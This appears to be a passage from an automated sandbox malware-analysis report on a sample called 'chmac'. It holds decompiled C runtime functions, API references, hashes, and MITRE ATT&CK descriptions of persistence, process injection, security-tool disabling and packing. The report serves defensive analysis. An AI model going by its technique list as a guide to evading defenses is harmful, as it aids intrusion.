						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
__alloca_probe_16.LIBCMT ref: 00407961
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
__alloca_probe_16.LIBCMT ref: 00407A46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
__freea.LIBCMT ref: 00407AB6

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

__freea.LIBCMT ref: 00407ABF
__freea.LIBCMT ref: 00407AE4

Memory Dump Source

Source File: 00000010.00000001.341979974.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x7ddc0b39
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
__fassign.LIBCMT ref: 004082E0
__fassign.LIBCMT ref: 004082FB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379

Memory Dump Source

Source File: 00000010.00000001.341979974.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x7ddc0b39
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}

0x00403639
0x00403640
0x00403643
0x00403647
0x00403652
0x0040365a
0x00403665
0x0040366b
0x0040366f
0x00403676
0x0040367c
0x0040367c
0x0040367e
0x00403683
0x00403688
0x00403688
0x00403693
0x0040369b

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688

Strings

mscoree.dll, xrefs: 0040364B
CorExitProcess, xrefs: 0040365D

Memory Dump Source

Source File: 00000010.00000001.341979974.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x7ddc0b39
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
__alloca_probe_16.LIBCMT ref: 0040633D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
__freea.LIBCMT ref: 004063A9

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000010.00000001.341979974.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00409BDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409BDD(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00405D6E(_t33) != 0xffffffff) {
					_t13 =  *0x4130a0; // 0x627e50
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00405D6E(2);
						if(E00405D6E(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00405D6E(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00405CDD(_t33);
						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E004047FB(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}

0x00409be4
0x00409bf1
0x00409bf7
0x00409bff
0x00409c0d
0x00000000
0x00000000
0x00000000
0x00000000
0x00409c15
0x00409c15
0x00409c17
0x00409c29
0x00000000
0x00000000
0x00409c2b
0x00409c3b
0x00000000
0x00000000
0x00409c43
0x00409c45
0x00409c46
0x00409c5e
0x00409c65
0x00000000
0x00409c73
0x00000000
0x00409c6e
0x00409bff
0x00409bf3
0x00409bf3
0x00000000

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
__dosmaperr.LIBCMT ref: 00409C68

Strings

P~b, xrefs: 00409BF7

Memory Dump Source

Source File: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_chmac.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: P~b
API String ID: 2583163307-2180883374
Opcode ID: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
Opcode Fuzzy Hash: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C

Uniqueness

Uniqueness Score: -1.00%

Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x7ddc0b3a
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D

Memory Dump Source

Source File: 00000010.00000001.341979974.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8

Uniqueness

Uniqueness Score: -1.00%

Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

APIs

GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
_abort.LIBCMT ref: 0040439E

Memory Dump Source

Source File: 00000010.00000001.341979974.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D

Uniqueness

Uniqueness Score: -1.00%

Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x004025ba
0x004025bf
0x004025cb
0x004025d0
0x004025d5
0x004025d7
0x004025e2
0x004025d9
0x004025d9
0x00000000
0x004025d9
0x004025cd
0x004025cd
0x004025cf
0x004025cf

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4

Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9

Memory Dump Source

Source File: 00000010.00000001.341979974.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

